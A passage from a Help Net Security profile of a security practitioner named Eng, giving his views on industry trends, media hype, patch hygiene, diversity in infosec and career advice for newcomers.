Other positive trends he pointed out are more attention paid to automation, companies handling vulnerability disclosures in a more structured and less adversarial manner, and more companies proactively baking security testing and other security activities into their development processes.
Also, CISOs are finally able to communicate the value of information security (and improvements to it) to a board-level audience. In the past, they would never even interact with the board unless there was a data breach.
He is more undecided about the changes tied to cybersecurity reporting. There’s no doubt that it is reaching a wider audience than ever before, but this is a double-edged sword: public awareness is up, but so are misinformation and FUD.
“The media gravitates toward people who speak in sound bites, regardless of their real-world experience. Even scarier, policy makers do too. Like most of the tech industry, we have a ‘thought leadership’ problem. We hear way too often from the same people,” he noted.
Changes he would like to see
He finds that people buy too much into the hype around detecting zero-day attacks, yet many are not even practicing basic hygiene such as patch management.
Organizations should also make sure they have an accurate view of their application perimeter, by keeping track of websites and other services that may have access to sensitive information.
The information security industry should aim to stop fixating on failure, characterizing developers as stupid, blaming victims, perpetuating dogma and glamorizing extreme paranoia, and start paying more attention to how it is perceived and finding ways to collaborate more effectively and reasonably with the people it’s trying to reach.
Another of Eng’s goals is to do everything he can to make the industry more welcoming to women and other underrepresented groups. “There is systemic misogyny in both tech and information security, and we need more people to acknowledge this and call out bad behavior,” he says.
Lessons learned
Of the most important lessons he’s learned over the years, none are technical:
“Having good security is not a motivation to the general public. People remember how you interact with them and whether you keep your word. Build relationships. Even the best ideas will never take off unless you can communicate well. Management is about developing people. Assume competence, at least until you’re disproven. Pick your battles.”
His advice to newcomers to the infosec industry is to network like crazy.
“Your best job opportunities will come to you through your professional network, not by submitting your resume blindly to job sites,” he says.
By that, he doesn’t mean “add as many people as you can on LinkedIn”, but rather connecting with people at conferences, at meetups, and on Twitter.
“These days, there are so many ways to connect with like-minded people. Take advantage of that, but at the same time, don’t expect to be spoon fed. Take some initiative, and demonstrate the ability to learn things on your own. There are online tutorials for just about every security topic imaginable – I wish information had been this easy to come by when I was getting into security. Be genuine and humble.”
Those who want to wade into security research should have a healthy dose of curiosity, the ability to self-teach, the willingness to take risks and occasionally fail, communication skills, and the aptitude and experience to contextualize risk rather than fear-monger.
“I personally believe humility is extremely important as well, maybe the most important – granted, arrogance won’t prevent you from finding bugs, but who wouldn’t rather work with people who are humble and kind?” he concludes.
from Help Net Security http://ift.tt/2hnQkiz